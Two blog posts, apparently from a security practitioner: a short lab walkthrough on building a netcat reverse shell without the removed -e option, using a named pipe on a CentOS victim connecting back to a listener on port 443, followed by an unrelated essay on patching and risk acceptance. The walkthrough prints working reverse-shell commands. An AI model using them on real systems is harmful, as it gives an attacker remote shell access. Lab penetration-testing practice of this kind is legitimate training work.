It’s been a long while since I have done any penetration testing. I have been working mostly in a senior leadership role for the last four years. That being said some of my security folks asked me about penetration testing so I decided to set up a lab. Actually I built the lab years ago… it is a very modified version of IronGeek’s Mutillidae. We ran through some basics on XSS and SQLi then I decided to channel Ed and start working on Netcat..
I was really surprised when I try to set up the ole netcat backdoor shell and got this error:
nc: invalid option -- 'e'
What did you do to my beautiful – e option??? Nc or netcat removed the –e option. I spent some time tonight consulting the Senior PenTester.. Google.
I found it has been depreciated on more recent versions of netcat. I understand why, it is a dangerous option. Dangerous, but oh soo much fun! I didn’t find any articles that worked. I found several articles that did were close. I assume the difference is in OS. Here is what worked for me.
Remember I am running CentOS 6.3 in my lab. (Victim) and I am using a Mac running Mavericks as the client. This was the magic combo that worked for me. I hope it helps you!
On the attacking system, a Mac running Mavericks. (NOTE: If you use a well known port, or non-ephemeral, or port below 1024, you have to run as root.)
nc -l 443
On the victim system you have to run the following commands. In this case it was Centos 6.3
mknod /tmp/ncshell p
/bin/sh 0</tmp/ncshell | nc 192.168.0.10 443 1>/tmp/ncshell
replace the 192.168.0.10 with the ip address of your attacking system.
If you get an access denied on the mknod command you don’t have to be root, it is access denied to the path /tmp. Go hunting for a directory you have permissions to read/write to.
How do we balance between customer experience, the availability of services and the need to keep our systems up to date and not vulnerable?
In dealing with operations teams, one topic seems to come up over and over again: the need for regular system level patching. While everybody agrees that regular patching mitigates the risk of vulnerabilities, it does not come without a price: You need to take your system out of production and make sure that your service is still available. Even with a very complex HA setup that allows minimizing the downtime, at the end of the day you have to overwrite a system binary with a new version. With that new version comes a possibility of unintended side effects on your production environment. It becomes clear that testing that new version is an essential effort to ensure minimizing the risk.
So, how do you handle discrepancies between your test and production environment? What do you do when your patch worked just fine in pre-prod but breaks something after rolling it out to production? There is a tendency to seek a risk acceptance from management immediately and stop patching, because the patching is interrupting the normal operation of systems which obviously goes against the business needs. It is surprising how often that option is picked without even small investigations into the root cause of the problem.
It is very important to have an independent function in place to question those risk acceptances. Having to explain to an auditor or a forensic team at a later point why a certain vulnerability was not patched, puts every security professional in a very tough spot. Additionally,not being able to produce sufficient evidence for a thorough investigation puts the company at risk for audit findings.
In Summary: patching is a very important part of your security posture. Every exception should be checked very closely and the possible consequences need to be made visible to the management as well. Thinking about compensating controls at the same time, even making them part of the risk acceptance process could be a very useful tool and should allow a healthy weighing of the options.